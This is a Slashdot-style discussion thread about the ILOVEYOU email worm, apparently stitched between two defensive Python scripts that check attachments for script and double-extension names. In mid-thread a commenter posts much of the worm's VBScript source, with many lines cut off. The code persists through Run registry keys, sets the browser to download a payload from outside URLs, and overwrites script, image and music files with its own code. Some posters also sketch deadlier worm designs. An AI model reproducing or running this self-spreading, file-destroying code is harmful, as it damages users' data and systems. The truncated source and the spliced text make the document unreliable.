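from email.message import EmailMessage

# Script-host extensions the posted worm itself infects (vbs, vbe, js, jse,
# wsh, sct, hta) plus a few other directly executable types.
SCRIPT_EXTENSIONS = {"vbs", "vbe", "js", "jse", "wsh", "sct", "hta",
                     "exe", "scr", "pif", "bat", "cmd"}
# Extensions a user reads as harmless data; a script behind one of these is
# the "hidden extensions" trick discussed in the thread.
DATA_EXTENSIONS = {"txt", "jpg", "jpeg", "gif", "doc", "mp3", "mp2",
                   "htm", "html", "pdf"}


def classify_attachment(filename):
    """Return (verdict, detail); verdict is 'ok', 'script' or 'masquerade'."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return ("ok", "no extension")
    real_ext = parts[-1]
    if real_ext not in SCRIPT_EXTENSIONS:
        return ("ok", real_ext)
    # With "Hide extensions for known file types" on, Explorer shows only the
    # name up to the last dot, so the user sees the inner extension.
    displayed = ".".join(parts[:-1])
    if len(parts) >= 3 and parts[-2] in DATA_EXTENSIONS:
        return ("masquerade", "shown as %r, really .%s" % (displayed, real_ext))
    return ("script", real_ext)


def save_attachment_non_executable(payload, dirpath, filename):
    """Write payload into dirpath as mode 0600 (owner read/write, never
    executable) regardless of the process umask. Returns the path."""
    safe_name = os.path.basename(filename)  # no path traversal via the name
    path = os.path.join(dirpath, safe_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(payload)
    # os.open's mode is still subject to umask; set the final mode explicitly.
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return path


def triage_message(raw_bytes, dirpath):
    """Classify and quarantine every attachment of one RFC 822 message."""
    msg = email.message_from_bytes(raw_bytes, policy=email.policy.default)
    report = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "unnamed"
        verdict, detail = classify_attachment(name)
        saved = save_attachment_non_executable(
            part.get_payload(decode=True), dirpath, name)
        mode = stat.S_IMODE(os.stat(saved).st_mode)
        report.append({"name": name, "verdict": verdict, "detail": detail,
                       "executable": bool(mode & 0o111)})
    return report


def build_sample_message():
    """Constructed sample resembling the ILOVEYOU mail; not a real capture."""
    msg = EmailMessage()
    msg["From"] = "someone@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "ILOVEYOU"
    msg.set_content("kindly check the attached LOVELETTER coming from me.")
    msg.add_attachment(b"On Error Resume Next\r\n", maintype="application",
                       subtype="octet-stream",
                       filename="LOVE-LETTER-FOR-YOU.TXT.vbs")
    msg.add_attachment("just some notes", filename="notes.txt")
    return msg.as_bytes()


def demo():
    with tempfile.TemporaryDirectory() as quarantine:
        return triage_message(build_sample_message(), quarantine)


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```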
Has anyone considered blaming Netscape and Sun for the even greater, incremental loss of money from JavaScript? How many billions of dollars in coding, design, and bandwidth have gone into popup windows, status bar theft, and rollovers?
Perl is such a spirit fouling venture that there is even a monastic commune for people who grok it.
bash scripting is by far the greatest sin, for it mimics C in an almost mocking way -- K&R would not be pleased...
--
--
E2 IN2 IE?
Viruses infect other executables, such that the original functionality is still there, but the viral code is executed when the program is first run, which gives it a chance to spread to other executables and/or become resident in memory.
Worms, on the other paw, are self-contained programs which contain nothing but the worm itself.
The definitions of these things are hardly new, they have been around for YEARS. I suggest reading section B2 of the comp.virus FAQ for more information.
I've already got more than enough copies of the old one. =)
As an example of this last one, I was thinking of a hypothetical virus in the shower this morning. The virus is non-malicious. It just installs a daemon on your computer. But the daemon is like a distributed.net client. So once it got propagated pretty good, I could submit tasks to these daemons and get answers back.
[...]
Hey! I've re-implemented FreeNet!
Sounds more like you've re-implemented DDoS.
Interested in learning Chinese or Japanese? check out Chinese/Japanese-English Dictiona
This functionality does not extend back to Dos days.
In essence you are right. It does not matter where the hole is located.
It could be in the web browser.. just as bad... hey an FTP client that executes files... ohhh death...
Even if the hole was in Napster...
However no mapping applications wasn't possible back in Dos days.
You may be thinking of when BBS Sysops could turn ANY application into a "door" accessible to anyone. All it's features.. including dos shell...
Sysops who mistakenly installed apps with Dos shell as doors had a back door similar to the one used by the e-mail virus.
However Dos back doors were installed by experienced hackers by hand. They did so not fully aware of just how many applications had dos shell support.
This happened to me when I installed DosHack. Of all things a Unix game ported to Dos could shell to Dos. Amazing...
This kind of problem can show up on ANY system. Dos, Unix, Windows, etc... It's installed by an expert who should know better.
It doesn't happen as often.. given that today it's SysAdm who have security issues crapped up the bum.. vs Sysops whose idea of security is running the BBS on a spare computer.
However this defect was installed by Microsoft's plug and play design. There isn't a Dos variant.
Side note... if this problem WAS found in MsDos would that absolve Microsoft? Or would it just give Microsoft a further history of neglect?
Also MsDos isn't a networked system.. Security by no access... That's security not even Unix can provide... With the apparent side effect of being a pain to get on-line
I don't actually exist.
What does VBS stand for again? Isn't it "Virus Broadcasting Script" or something like that? 8-)
Adrian
Many moons ago an if condition was messed up and extrans was the same as plain text.
:-)
When the slash code came out, the first thing that I did was went to make some fixes to bugs in plain text that had been bugging me for ages. While I was doing that I noticed the mistake in the if condition and made extrans be what it was advertised to be also. The patch was accepted.
Amusingly, any Python fans
who find that indenting works
have a Perl bigot to thank.
(Namely me.:-)
Cheers,
Ben
My usual seat in the cluetrain is at A HREF="http://pub4.ezboard.com/biwethey.ht
I'd like to add, however, that most computers are single-user devices now and there aren't typically "other users files" on your computer.
That is true of most office computers or home computers of single people, but far less often true of home computers that are used by a couple or a whole family. Some offices have some people sharing computers for various reasons (shift-splitting, receptionists, etc), so the statement isn't 100% true in the office world either.
I also read somewhere that with Win2K it's not possible to overwrite system files.
It's less likely under Windows 2000, supposedly even more so than NT, but most desktop users are using Windows 9x, and the upgrade path for most of those people for the immediate future will be to Windows ME, as Windows 2000 is not really targeted at that audience.
(although I suppose a virus could just as easily destroy non-system applications).
Very true. Unfortunately, security in the Windows world is normally set so that any user can write into program files.
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
You know the law that lets people sue you if their kids drown in your swimming pool, if you don't have a fence or anything?
It occurs to me that leaving a gigantic security hole in a system with millions of users is roughly similar. After Melissa, I think we knew about this, and I think Microsoft could have actually fixed the problem.
My blog: http://www.seebs.net/log/ --- My iPhone/iPad app: http://www.seebs.net/seebsfrac/
Not really. I don't believe that perl scripts need execute bits set for "perl " to run them. So if someone were to write a unix mail client that automatically ran "perl " on attachments where has a .pl extension, it would be rather dangerous.
That is true, although as far as I know there is no such mail program, and it is highly unlikely that one with such an obvious security flaw would ever become popular in the Linux world.
Of course, I'm increasingly an advocate of using CVS for *any* project that involves extended development time, which would save the user's ass if such a thing happened on unix. But AFAIK, VC tools aren't really ready for nonprogrammers, just yet.
You might want to check out gCVS and/or Cervisia, which are (Gnome and KDE respectively) GUI based front ends for CVS. They are both rather recent products, but they do give a more point-n-drool user interface to CVS.
That is a very interesting task anyway, I'm sure any programmer ever thought about it (I did). Fortunately not everyone realises it. And after you realise it, you would like to try it "only in this little network". Then it's too easy to lose control of it. At least most captured virus creators say so.
as long as you aren't running attachments from root, how much damage could such a virus do?
---
I post links to stuff here
So, here's my theory: Symantec and NAI, et al., are largely at fault for this one.
They put out a band-aid. Because there was a band-aid, millions of computers were not actually fixed. So, thanks to the anti-virus companies, people whose systems are still quite vulnerable *THOUGHT* they were safe.
If, instead of shoving out a band-aid, they had said "this isn't something virus software can stop, you need to turn off your scripting host", millions of people would not just have lost days or weeks of work.
Isn't that weird? Half-assed solutions don't really work.
My blog: http://www.seebs.net/log/ --- My iPhone/iPad app: http://www.seebs.net/seebsfrac/
Thanks a lot. You just fucked up my entire system. I'll be digging through a backup tape for days. :-(
We're going down, in a spiral to the ground
"Intelligent mail client users continue to be unaffected" written by our CmdrTaco is a brilliant one liner that really sums up this whole thing. Somewhat ironic if you think about it, Outlook is supposed to be more intelligent than some terminal program like PINE but that is not the true case. I guess the idea that idiot proofing only allows idiots to be dumber is somewhat true- a slick graphical program is sometimes just more overhead. Just to throw this in "The ILOVEYOU sympathy virus has been annoying the heck out of us for days now... it works on the honor system: Please delete some files and mail to all your friends" still requires root access for damage equivalent to our MS Windows. Little old me can't delete random parts of glibc with my account, even after I spend hours learning how to use rm ("rm -rf" is so nice) and mastered the idea of wildcards to achieve some randomness.
No, I'm a student =)
One of my workterms standardized into outlook though, and I could only imagine what happened when .vbs worms first hit.
Someone ought to do a statistical analysis of the worm's distribution patterns, and come up with some real interesting numbers.
One question that begs to be answered: is how much email was being sent in your corporate network?
If all@blah.com contained HUNDREDS of addresses, and HUNDREDS of people were clicking on a message at around the same time, this could lead to a quite exponential flow of email traffic.
I would imagine if it ever went this high, the email server(s) would just not handle the load.. or, in a worst case, the network could not handle it? (that would be a hell of a lot of exponential growth)
Or, was it shut down to merely stop people from losing data (perhaps)/ stop all the phonecalls to the helpdesk, etc etc.
I've found pine to be easier to use and more powerful than the graphical user interface mail clients. With the recent rash of destructive viruses I would now add pine being more secure to this list. I can also access my mail from anywhere via a simple telnet or ssh connection.
Far be it from me to make a fuss over /. moderation, but the parent message to this, though it is marked down to -1 (troll), really wasn't. Since it may have fallen out of sight, I quote it:
(a) Outlook doesn't modify any files -- Windows does. On NT, no system files can be modified.
But Outlook is so tightly integrated that the distinction is moot, synergy, innovation, blah blah blah... Anyway so I heard you have to make \WINNT\SYSTEM32 accessible to all MS Office 97 users. If it is in a FAT partition you're screwed anyway, security-wise (on the other hand you can come up in MS-DOS and fix things), but even if your system drive is an NTFS partition, so you can lock down the \WINNT\SYSTEM32 directory for users, for some ungodly reason Office 97 must write data there so you can't. That's what I read somewhere, and if I'm wrong, please correct me.
(b1) No version of the ILOVEYOU virus executes from the preview pane.
At the instant our AC posted this, it may or may not have been true, and it may or may not be true at the present moment. But if it's possible at all to write vbs code which self-executes in the Outlook preview window, some funloving so-and-so somewhere is busy tonight shoehorning it into the framework of ILOVEYOU - a world-girdling open-source virus in plaintext, proudly signed by the author no less! Gotta love those Filipinos, you know Lynda Barry's candid like that too.
To tell you the truth, to make it automatically self-actuating would take something away from the complexity, elegance and depth of this worm. As curious as the technical details, all generously laid out for our inspection, may be to a casual aesthete appreciating the art of virus composition, the social-engineering aspects of worms like Melissa and ILOVEYOU are even more interesting; it adds an additional depth to the process of propagation if the virus must somehow inveigle or seduce a human user to play a part in its reproductive cycle. At least I think so.
(b2) With a policy file, an admin can force all workstations in a domain to show file extensions.
I'd be interested in you telling me how that's done. It's always been a minor irritation to me, that, and I've got a whole office-full of NT desktop machines and users who jump from one machine to the next.
Yours WDK - WKiernan@concentric.net
Call the application dumb cos it overwrites files, not the OS
If you were installing something as root, and it overwrote your kernel and shared objects and stuff, you wouldn't be blaming Linux, would you?
This kind of prejudice is sooooooooooooooo Linux.
The thought of creating some self-reproducing artificial lifeform and releasing it into the environment to see how it survives is just cool. Make it self-modifying and see if it can adapt and expand to fill it's ecological niche before the predators devour it. It's the temptation to play god on a grand scale.
Of course you can get the same thrill with genetic algorithms and a-life, which is why I've never succumbed to the temptation of the Dark Side myself, but the draw is still there...
Read a good book lately?
Some of this has been said by others in this thread already, but I'll try and be short.
1) Not all people who get hit by this are actually stupid, they're just victims of bad windows design and made the mistake of trusting the people who designed their software... and have been trained to habitually click through a bunch of dialog boxes if they want to get their work done some time this millennium.
For example, the DEFAULT in windows is to "Hide extensions of known file types." I've always thought this is the most ridiculous option ever, since tiny icons are NOT intuitive, and even Windows friggin 2000 is still 100% trusting of file extensions for file types. What happens here? Well, they get a file attachment on email that is named ILOVEYOU.TXT with an icon that symbolizes a VBScript, which they don't recognize. They hear their geek friend saying, "You can never get a virus from a .txt file", so they just click through all the dialog boxes. (Correct me if I'm 100% wrong here. I haven't verified this, just writing from memory of the one time in my life I used Outlook on a new machine.)
2) Even though it's possible to be multi-user safe in W2K, it isn't the norm. Windows as a multi-user platform sucks! Even Windows 2000. There is no such thing as a root shell. This means, whenever a user needs to do something that requires Superuser privileges (like installing a font pack for IE), they must stop everything they are doing and log out, then log back in as Administrator. Sometimes this even involves bugging IT to do it for you (and even the worst MCSEs get bored installing font packs all day because someone sent a URL to a joke on a site in Israel to the whole company). A few psychological penalties like this, and people just end up giving their normal user full privileges.
3) Users are conditioned to just click-through everything. This isn't a Windows-only problem. I would say it's mostly Microsoft's fault, since they "innovated" the modern EULA as well as overuse modal dialog boxes. "To use this software you must agree to this 5-page EULA written in lawyerese and for some reason contained in a 20x20 scrollbox with tiny font. (Yes, I agree | No, I don't want to use this software I've already paid for)" "This page requires a plugin of type text/vbscript-hard-drive-eraser. Install now? (Yes | Yes | Yes | No)".
So, when the user gets "Attachments may contain executable code [insert sound of adults talking in Charlie Brown]", they habitually just click yes. This is reinforced when they were a new user and they were frightened by a threatening dialog box like "Unable to connect to host. Connection reset by peer", so they asked for help. The lab tech who came over says, "Oh for heaven's sake, just click OK and try again."
[#include apologies_for_wordiness.h]
If you are a paranoid unix user, you need only have an e-mail account that is NOT the account you use for usual work and have xbiff/whatever monitor that mailbox. A quick su to your email account (in a script or in kbiff or whatever) will allow you to read and send e-mails but the very worst a virus could do would be to delete any e-mails you hadn't copied to your real account. All automated and transparent!
When Melissa hit, the big "X" got slammed... HARD! One reason is that the first address in everyone's address book was "all@corpname.com", so there were literally hundreds of thousands of emails being sent. Completely shut down the mail system for the better part of the day.
When I checked my Outlook queues later, I found a couple hundred copies of Melissa in the deleted folder. But, the funny part was, with the filters the Unix sysadmins put in place, not a single copy made it through to my Unix address!
Live and learn.... hopefully.
-- Your Servant, B. Baggins
Perhaps now people will realize that running in Windows dumb mode (without the last extension) is really stupid. I haven't found anyone who does something real with their computer to find dumb mode useful. Perhaps new versions of Windows will not have dumb mode as the default.
Or perhaps not.
I am a bad speler. Please ignore speling meestakes in me poast.
"Intelligent mail client users continue to be unaffected "
I assume by this statement you mean those not running windows e-mail clients?
-D
"I'm a slave of Karma, Spin the Wheel and I'm a king reborn."
With windows being the most predominant OS and the virus specifically targeting that base, why should other computers get pulled into this messy game. Every computer illiterate (ok not savvy) person who listens to this "Computer bug (or whatever)" they think it is universal and applicable to everything because it happened to more than one person. What they don't understand is it did not happen on all the million mainframes, HPs, Sun, VAXs, Alphas and Linux machines. It happens only on Windows machines - So let us start terming the bug as a Windows bug or Windows virus instead of a generic computer bug. This goes a long way in getting the mindset of people that if you want to be on the Internet use a secure OS - Mac, BeOS or Linux pick your choice.
I probably shouldn't post this, because I'll give virus writers some new ideas. But hell, this is /. and I'm going to do it anyway.
I'm also posting this so admins can watch out for it in case a virus writer gets the idea anyway.
Although we had problems with VBS, thinking back about the Melissa virus coming from a Word document, I fear that someone will write a virus that instead of reading your address book, reads your inbox, and then sends a reply back to all those that have sent you mail. This seems to be more likely something that people will open.
I'm basically forced to use Outlook at work (at home I use pine and netscape) but I deal with documents all day. I constantly mail, forward and reply Word documents to my colleagues. But if I receive a reply from someone with a Word document, I'm more likely to open it (although I do have macros turned off).
Just a fear of mine, and hopefully there's a solution before there's a virus.
Steven Rostedt
-- Nevermind
Someone on one of the mailing lists I'm on half-jokingly suggested that the next obvious step for ILOVEYOU would be dynamically generated content. Little did anyone suspect that it would actually happen. I say the next step is a -- ooh, I got it! -- a version that has its payload as a message warning about the dangers of Outlook viruses, in effect describing what it's doing to you while doing it.
It's all fun to joke about as an academic exercise, but this is really gonna mess people up. My boss tells me I'm free to set up an Outlook Express account here, but I'm happy to just forward my mail to my pine account. ASCII doesn't scare me, I see no reason to ditch it...
DO NOT LEAVE IT IS NOT REAL
As has been thoroughly hashed out in the threads of the articles following the last virus/worm outbreak, Linux isn't 100% immune from viruses/worms, but it is much more resistant due to a few reasons:
First, executability is determined by access bits, not by file extension. This means that normally downloaded files like attachments get saved un-executable, meaning that users have to intentionally try to change the access bits on the files to execute them, not just click on them.
Secondly, unless the root user is the one reading the email and running attachments, the virus/worm is limited by security/permissions rights to what it can do. While it can do damage to a single user's files, it can't very easily blast other users' files or system files. On Windows 9x, there is basically no security, so viruses/worms like ILOVEYOU are free to twink with the registry, etc.
Thirdly, the homogeneous nature of the Windows world makes it a much easier and more attractive target for virus/worm authors. It is pretty safe to assume that virtually all Windows 9x clients will have Outlook and all the associated DLLs on their system. There is no single email client in the Linux world that is so ubiquitous. That makes it more difficult to write viruses/worms that will affect a large percentage of Linux users because the virus/worm creators can't make the kind of assumptions about how to read things like address books, etc. that they can under Windows. This is unlikely to change any time soon, because the Linux world is much more diverse than the Windows world.
While you are right up to a point that in many ways it is the users that are stupid, Outlook and Windows make the problem worse by making it so much easier for the users to shoot themselves in the foot. And to a certain extent, Windows is plagued with a much higher percentage of stupid users because it intentionally caters to the least common denominator. To a certain extent, as Linux gets easier to use, it may start to see more of the semi-stupid users.
Every time there is a virus that paralyzes our email server it is always on a Friday! So when I want to reach my friends to plan the weekend I have to use... The phone !!??
So to the people who make those viruses, could you possibly do it on a Monday next time.
Thank you kindly.
Imagine, if you will, a time in the future when a Win2K sysadmin is reading mail while logged in to Active Directory with an administrative level ID (big no no)
A script kiddie fresh out of VBScript for ADSI 101 has practiced his newfound craft
The unknowing sysadmin opens a msg entitled "Get your MCSE and earn more cash!"
The Active Directory Tree is felled....
"Hatred is the coward's revenge for being intimidated"
Thanks, you've just suggested an idea for the most destructive yet of these viruses. People will get one saying "RUN THIS, it is like ILOVEYOU except it will protect your system from all of these viruses in future!" (or phrased in more convincing-to-lamers language), and there might even be some publicity about it. So everyone jumps and runs it as quickly as they can ---- and in fact it goes and [insert favourite malicious action]. What would be even worse is if it looked like it inoculated you for 24 hrs or so, and then delivered its payload.
Well, Outlook users deserve everything they get, IMO, but it's funny how I never saw this story referenced on slashdot.
I can't remember the name of the version I installed (if you're interested I'll find it when I get home), but I got the international version of PGP and it works with just about everything on my system.
Eudora, BBEdit, Simple Text, and many more.
There's a permanent icon menu for it in the menu bar too. Pretty sweet.
---CONFLICT!!---
I believe Eudora would cost you about $50 if you're not upgrading a previous purchase. The newest version (4.3.1) gives you options... 1) a feature-limited free mode. 2) a fully-functional "sponsored" mode - it downloads ads that display in the window. 3) paid mode - send money, get all the features without the ads. I remember when I first bought Eudora (3.0) that the PGP program was there, but it doesn't seem to be available as an option in my current version. That may be because I downloaded the upgrade.
- "Well?" "Deep Subject."
The really sad thing about this "virus" is that I've received it at least 10 times from different sources - and I haven't received any copies of the original ILOVEYOU virus (or any variants).
Viruses are challenging and interesting.
Yeah, like biological ones. But we don't go around spreading them happily, do we?
Some of the ideas used in them have been incorporated into modern software.
Like? I can only think of BSOD as an example of payload.
Just like anything else if you don't use viruses to harm people or data there is nothing wrong with them at all.
Yes, like anything else. But if you don't use them so, what do you use them for?
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
Yet Another Offtopic Question Of Yours Truly.
How should I translate Honor System?
Does it mean: the system that should get honor, or the system that is honored, or the system that does something with the substantive honor (like "the time machine")?
Tnx...
It's... It's...
"We can confirm that Debian does *not* ship the version with the trojan horse. Our version predates it." [CA-2002-28]
Email virus infestations are never gonna end until we start properly training users in how to use computers. I think the primary problem is all of those "Learn how to use a computer and make thousands of dollars!" courses. People take a quick class at some no-name training center, bill themselves as computer literate, and then completely blow away a hard-drive, or network share by double clicking on an attachment that they should have had the sense NOT to open after we've told them not to the FIRST 50 times.
Corporations will get what they pay for. When you set computers down in front of billions of people who have never previously seen/used one, with no real prior training, Bad Things (tm) tend to happen.
--cyphergirl
--Insert catchy
The virus takes its name randomly from the recent documents folder, so I was wondering if there is nothing in that folder, what would happen?
-motardo
Hear me out. Linux is Microsoft's main competition right now. Because of this we are forcing them to "innovate", something they would usually avoid.
Now if MS Bob has taught us anything, Microsoft is not a company that should be innovating. When they do, they don't come up with things like "better security" or "stability", they come back with "talking paperclips", and "throw in every useless feature we can think of, memory footprint be damned".
Unfortunately, they also come up with the bright idea of executing email. Now MIME attachments aren't enough, they want you to be able to run/open attachments right when you get them (presumably to make sure you EXECUTE .exe files to make DAMN SURE you read any EULA contained within). This sounds like a good idea to people who believe renaming directories to folders made computing possible for the common man, but security wise it's like vigorously shaking a package from the Unabomber.
So my friends, we are to blame. We pushed them into frantically trying to invent "necessary" features to stay on top, and look where it got us. Many of us are watching our beloved mail servers go down under the strain and rebuilding our company's PC because of our pointless competition with Microsoft.
I implore you all, please just drop this Linux thing before Microsoft innovates again.
Finkployd
ok, i'll forward your comments to my mom-in-law
.oO0Oo.
I'm sure she'll learn a very valuable lesson
meanwhile I'm sure she'd prefer to use the same client at home that she uses at work
There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter
Is it the mail clients that are intelligent, or the users?
-- Ed Avis ed@membled.com
I never once received an ILOVEYOU. I feel deprived. I kinda wanted to see it. :-) Of course, using Netscape in Linux makes me immune...
It's quite simple to write a small piece of VBA to delete all e-mail with .vbs attachments on arrival. We've had this at our company for a while now, and it does the trick...
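The on-arrival filter this comment describes, as an added example that is not code from the thread or from any poster: a Python version that parses an incoming message and blocks script attachments, including double-extension names like ILOVEYOU.TXT.vbs that the hidden-extensions comment earlier in the thread explains look harmless on Windows. The blocked and decoy extension lists and the sample addresses are assumptions made for the example.

```python
# Added example (not from the thread): mail filter that refuses script
# attachments, including ILOVEYOU-style double extensions such as .TXT.vbs.
import email
from email import policy
from email.message import EmailMessage

# Script/executable types the filter refuses (assumed policy, not a standard list).
BLOCKED_EXTENSIONS = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "exe", "scr", "pif", "bat", "cmd"}
# Extensions users expect to be harmless; used to spot a decoy in front of the real one.
DECOY_EXTENSIONS = {"txt", "doc", "jpg", "gif", "htm", "html"}

def classify_filename(name):
    """Return (verdict, reason) for one attachment filename; only the LAST extension counts."""
    parts = name.lower().split(".")
    if len(parts) < 2:
        return "allow", "no extension"
    real_ext = parts[-1]
    if real_ext in BLOCKED_EXTENSIONS:
        if len(parts) > 2 and parts[-2] in DECOY_EXTENSIONS:
            return "block", f"double extension .{parts[-2]}.{real_ext}"
        return "block", f"script/executable attachment .{real_ext}"
    return "allow", f".{real_ext} attachment"

def scan_message(raw):
    """Parse raw RFC 822 text and return (filename, verdict, reason) for every attachment."""
    msg = email.message_from_string(raw, policy=policy.default)
    results = []
    for part in msg.walk():
        filename = part.get_filename()
        if filename:
            results.append((filename,) + classify_filename(filename))
    return results

def should_drop(raw):
    """True if any attachment is blocked; the caller deletes or quarantines the mail."""
    return any(verdict == "block" for _, verdict, _ in scan_message(raw))

def build_sample(attachment_name):
    """Constructed sample mail (addresses are made up) with one attachment."""
    msg = EmailMessage()
    msg["From"] = "colleague@example.com"
    msg["To"] = "you@example.com"
    msg["Subject"] = "ILOVEYOU"
    msg.set_content("kindly check the attached LOVELETTER coming from me.")
    msg.add_attachment(b"x", maintype="application", subtype="octet-stream", filename=attachment_name)
    return msg.as_string()

if __name__ == "__main__":
    for name in ("ILOVEYOU.TXT.vbs", "report.doc", "setup.exe"):
        print(name, scan_message(build_sample(name)))
```

Note that the check keys on the attachment's real (last) extension, not on the MIME type, because the trick the thread discusses is precisely that the visible name hides that extension.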